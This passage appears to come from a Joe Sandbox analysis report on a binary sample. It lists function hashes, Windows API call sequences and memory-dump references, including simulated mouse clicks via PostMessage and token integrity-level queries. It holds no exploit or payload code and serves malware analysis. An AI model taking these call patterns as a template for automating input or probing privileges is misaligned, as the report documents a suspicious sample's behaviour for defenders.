                    • Opcode ID: ec1abf910f6cf7121dd9495d5c8054542fcee2a3085305575a9947c56b65f356
                    • Instruction ID: 99443f3ba2714374a64d6e1600daf4e93d6aa6069f8ec0c4d4c56c11e84155df
                    • Opcode Fuzzy Hash: ec1abf910f6cf7121dd9495d5c8054542fcee2a3085305575a9947c56b65f356
                    • Instruction Fuzzy Hash: 52418371604119FBDF169F64C848EEDBB74FB09360F60836EF92896291C7385960DB91
                    APIs
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0079695D
                    • TranslateAcceleratorW.USER32(?,?,?), ref: 007969A9
                    • TranslateMessage.USER32(?), ref: 007969D2
                    • DispatchMessageW.USER32(?), ref: 007969DC
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007969EB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                    • String ID:
                    • API String ID: 2108273632-0
                    • Opcode ID: baf2f1df87e29a43cee0574bdd3a2f0b0935591668784c43afa861f86e512ea3
                    • Instruction ID: b9f7db4e434d4eda836ac2d717dcbaeb5b04bb5c4796f959319459f6a04e8061
                    • Opcode Fuzzy Hash: baf2f1df87e29a43cee0574bdd3a2f0b0935591668784c43afa861f86e512ea3
                    • Instruction Fuzzy Hash: 2631A171904246AEDF60CF74AC44FB67BACFB01324F14836DE421D61A1E73DA8A5D7A0
                    APIs
                    • GetWindowRect.USER32(?,?), ref: 00798F12
                    • PostMessageW.USER32(?,00000201,00000001), ref: 00798FBC
                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00798FC4
                    • PostMessageW.USER32(?,00000202,00000000), ref: 00798FD2
                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00798FDA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: MessagePostSleep$RectWindow
                    • String ID:
                    • API String ID: 3382505437-0
                    • Opcode ID: 5a2ca293252baa8c49d9e0e3229a8242e05c884d8d6f33e8b6fe4d98d40ace50
                    • Instruction ID: 3bbf6822114c9c590751a835af2c70b4ba75677bdec589b94a363f981551c43b
                    • Opcode Fuzzy Hash: 5a2ca293252baa8c49d9e0e3229a8242e05c884d8d6f33e8b6fe4d98d40ace50
                    • Instruction Fuzzy Hash: BD31E071500219EFDF00CF68E94CA9E7BB7EB05315F108229F925EA2D0C7B89910CB91
                    APIs
                    • IsWindowVisible.USER32(?), ref: 0079B6C7
                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0079B6E4
                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0079B71C
                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0079B742
                    • _wcsstr.LIBCMT ref: 0079B74C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                    • String ID:
                    • API String ID: 3902887630-0
                    • Opcode ID: 57bb4563685b71a978af64f6357916e74e7a29496bcde6a7542c1db9f782b7d5
                    • Instruction ID: 5e343c0832524ebb0b7a213e6ae5f0c5b6c87d91b895e218bb82d2ece334bf39
                    • Opcode Fuzzy Hash: 57bb4563685b71a978af64f6357916e74e7a29496bcde6a7542c1db9f782b7d5
                    • Instruction Fuzzy Hash: C721D331204204BAEF255B79BD49E7B7B99DB89710F00812AFC06DA2A1EB69D84097A0
                    APIs
                      • Part of subcall function 00742612: GetWindowLongW.USER32(?,000000EB), ref: 00742623
                    • GetWindowLongW.USER32(?,000000F0), ref: 007CB44C
                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 007CB471
                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 007CB489
                    • GetSystemMetrics.USER32(00000004), ref: 007CB4B2
                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,007B1184,00000000), ref: 007CB4D0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Window$Long$MetricsSystem
                    • String ID:
                    • API String ID: 2294984445-0
                    • Opcode ID: e562998bf4f1f7325088c53e8c8386c73e8b156c0e90f135f05a96d116993ca6
                    • Instruction ID: 4662c2ea851dfa51196f0599d8c08061cf991cdf266387feb5f8c0d042baa8d7
                    • Opcode Fuzzy Hash: e562998bf4f1f7325088c53e8c8386c73e8b156c0e90f135f05a96d116993ca6
                    • Instruction Fuzzy Hash: 12217E31918695AFCB188F38DC05F6A37A5FB05720F14873CF926D61E2E7349A20DB80
                    APIs
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00799802
                      • Part of subcall function 00747D2C: _memmove.LIBCMT ref: 00747D66
                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00799834
                    • __itow.LIBCMT ref: 0079984C
                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00799874
                    • __itow.LIBCMT ref: 00799885
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: MessageSend$__itow$_memmove
                    • String ID:
                    • API String ID: 2983881199-0
                    • Opcode ID: 3218be2ef67fc0a494c72194256a040ca00062bcf74b58e90c8602d32caad1cd
                    • Instruction ID: 98aaccf390788f3a1c4ee45288da864a061c49f2a000a41728cd2f6a18903a17
                    • Opcode Fuzzy Hash: 3218be2ef67fc0a494c72194256a040ca00062bcf74b58e90c8602d32caad1cd
                    • Instruction Fuzzy Hash: 0E21C871B00204EBEF109A699C8AEEE7BA9EF49710F04402DFE05EB291D7788D45D791
                    APIs
                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0074134D
                    • SelectObject.GDI32(?,00000000), ref: 0074135C
                    • BeginPath.GDI32(?), ref: 00741373
                    • SelectObject.GDI32(?,00000000), ref: 0074139C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: ObjectSelect$BeginCreatePath
                    • String ID:
                    • API String ID: 3225163088-0
                    • Opcode ID: d1ae86fa8622b14e628ec7878712927396f4997d0e22596fd0643058441f7432
                    • Instruction ID: 7071c7c4011331d5a4675f314893410dc11712e7615ec78855b0a6d09183fec9
                    • Opcode Fuzzy Hash: d1ae86fa8622b14e628ec7878712927396f4997d0e22596fd0643058441f7432
                    • Instruction Fuzzy Hash: 83213C70900208EBDB11AF25DC08B697BF9FB00761F54C22AF814965B0E77999F1DB91
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: _memcmp
                    • String ID:
                    • API String ID: 2931989736-0
                    • Opcode ID: a72ca8b9e2307e14118e30d0a9a107919b7d1ae4c76293f3f55756f58233b465
                    • Instruction ID: 39cabc5d71b22d178c5954b235eff008297d426db698fb67b7fd320484f5b6bd
                    • Opcode Fuzzy Hash: a72ca8b9e2307e14118e30d0a9a107919b7d1ae4c76293f3f55756f58233b465
                    • Instruction Fuzzy Hash: E401B9F168410D7BEE05A620AD46F6B775C9B21394F484012FD0597383EA9CDE12C6F9
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 007A4D5C
                    • __beginthreadex.LIBCMT ref: 007A4D7A
                    • MessageBoxW.USER32(?,?,?,?), ref: 007A4D8F
                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 007A4DA5
                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 007A4DAC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                    • String ID:
                    • API String ID: 3824534824-0
                    • Opcode ID: 2bf4777a78b178b52ce0bb44420acc2d975e1f58d0d00218350d7021f639b33a
                    • Instruction ID: 3cf8f0cba221e72be81b65c82e51999d3a8c790e92c1850b48e0a23fd4fb779a
                    • Opcode Fuzzy Hash: 2bf4777a78b178b52ce0bb44420acc2d975e1f58d0d00218350d7021f639b33a
                    • Instruction Fuzzy Hash: FA1108B2A04248BBC7119BB89C08E9A7FADFBC5320F184369F914D3250D6B98D1087A0
                    APIs
                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00798766
                    • GetLastError.KERNEL32(?,0079822A,?,?,?), ref: 00798770
                    • GetProcessHeap.KERNEL32(00000008,?,?,0079822A,?,?,?), ref: 0079877F
                    • HeapAlloc.KERNEL32(00000000,?,0079822A,?,?,?), ref: 00798786
                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0079879D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                    • String ID:
                    • API String ID: 842720411-0
                    • Opcode ID: 3fcb905a85b6432beafa1cc37e207525efedf98fb79358a92d8eaf0d9da6826a
                    • Instruction ID: 3edbedf021b855bfa219283c762672f3da99d45766a82df9f2239b7a2b4a04a1
                    • Opcode Fuzzy Hash: 3fcb905a85b6432beafa1cc37e207525efedf98fb79358a92d8eaf0d9da6826a
                    • Instruction Fuzzy Hash: 07014B71200208FFDB204FE6EC88D6B7FADEF8A355B204429F849C6260DA358C00DA60
                    APIs
                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007A5502
                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 007A5510
                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 007A5518
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 007A5522
                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007A555E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: PerformanceQuery$CounterSleep$Frequency
                    • String ID:
                    • API String ID: 2833360925-0
                    • Opcode ID: 99ddbcf60b655ea166cf42eb49b2130b840e6d7e807c2b2bff18edd503dfc50c
                    • Instruction ID: faf25cf3cabd8be68927418a64425281c2aebbcec1fe28026f03b533318f4679
                    • Opcode Fuzzy Hash: 99ddbcf60b655ea166cf42eb49b2130b840e6d7e807c2b2bff18edd503dfc50c
                    • Instruction Fuzzy Hash: E4016171D00A1DDBCF00DFE4E8489EDBB7AFB4A711F05425AE901F2140DB385564C7A5
                    APIs
                    • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0079758C,80070057,?,?,?,0079799D), ref: 0079766F
                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0079758C,80070057,?,?), ref: 0079768A
                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0079758C,80070057,?,?), ref: 00797698
                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0079758C,80070057,?), ref: 007976A8
                    • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0079758C,80070057,?,?), ref: 007976B4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: From$Prog$FreeStringTasklstrcmpi
                    • String ID:
                    • API String ID: 3897988419-0
                    • Opcode ID: 9abd73a3ff142f7eee76491eec26d37ca250c28ce303d612792ff6d634b5f6f9
                    • Instruction ID: 55ae363a566acbcdcc43f16f01f760b29cde7e24a612be51d4f56d5861d25909
                    • Opcode Fuzzy Hash: 9abd73a3ff142f7eee76491eec26d37ca250c28ce303d612792ff6d634b5f6f9
                    • Instruction Fuzzy Hash: 8E017172615604BBDB145F58EC44EAA7BFDEB44761F144028FD04D2211E739DD41D7A0
                    APIs
                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00798608
                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00798612
                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00798621
                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00798628
                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0079863E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: HeapInformationToken$AllocErrorLastProcess
                    • String ID:
                    • API String ID: 44706859-0
                    • Opcode ID: 860a330df1206adf214e462e5e6c6925eb4d8d47667390714a5ee3b051756abb
                    • Instruction ID: f50527ea0440313d997fb5ce4a24270cc7a996cf55b20c8cbdc10f0f9db8ae14
                    • Opcode Fuzzy Hash: 860a330df1206adf214e462e5e6c6925eb4d8d47667390714a5ee3b051756abb
                    • Instruction Fuzzy Hash: 6EF06231201204BFEB101FB5EC8DE6B3FADFF8A754B044429F945C6151CB799C41DA65
                    APIs
                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00798669
                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00798673
                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00798682
                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00798689
                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0079869F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: HeapInformationToken$AllocErrorLastProcess
                    • String ID:
                    • API String ID: 44706859-0
                    • Opcode ID: 424d3d36fd13b25fa618d3e93855367880e5fc2885762cd348a26c34985aa8eb
                    • Instruction ID: 791d1e941ab319e186ace803e77437a015cfef5807582cb1881f6cf78c7dd903
                    • Opcode Fuzzy Hash: 424d3d36fd13b25fa618d3e93855367880e5fc2885762cd348a26c34985aa8eb
                    • Instruction Fuzzy Hash: 88F04971200204AFEB211FA5EC88E6B3FBDFF8AB54B14402AF949CA151CB699D41DA65
                    APIs
                    • GetDlgItem.USER32(?,000003E9), ref: 0079C6BA
                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 0079C6D1
                    • MessageBeep.USER32(00000000), ref: 0079C6E9
                    • KillTimer.USER32(?,0000040A), ref: 0079C705
                    • EndDialog.USER32(?,00000001), ref: 0079C71F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                    • String ID:
                    • API String ID: 3741023627-0
                    • Opcode ID: 8e7c123720b86a778fa976de29f5f20e54a56730ab74af71e0e4308e14175af1
                    • Instruction ID: 18774761bed63b3abf6c59abc0fbd60b8ac6dc58201e4bcacc57818bb0f31c28
                    • Opcode Fuzzy Hash: 8e7c123720b86a778fa976de29f5f20e54a56730ab74af71e0e4308e14175af1
                    • Instruction Fuzzy Hash: 9C016D30500704ABEF229B60ED8EFA677B9FF00705F00466DF582A14E1DBF8A9588F84
                    APIs
                    • EndPath.GDI32(?), ref: 007413BF
                    • StrokeAndFillPath.GDI32(?,?,0077BAD8,00000000,?), ref: 007413DB
                    • SelectObject.GDI32(?,00000000), ref: 007413EE
                    • DeleteObject.GDI32 ref: 00741401
                    • StrokePath.GDI32(?), ref: 0074141C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Path$ObjectStroke$DeleteFillSelect
                    • String ID:
                    • API String ID: 2625713937-0
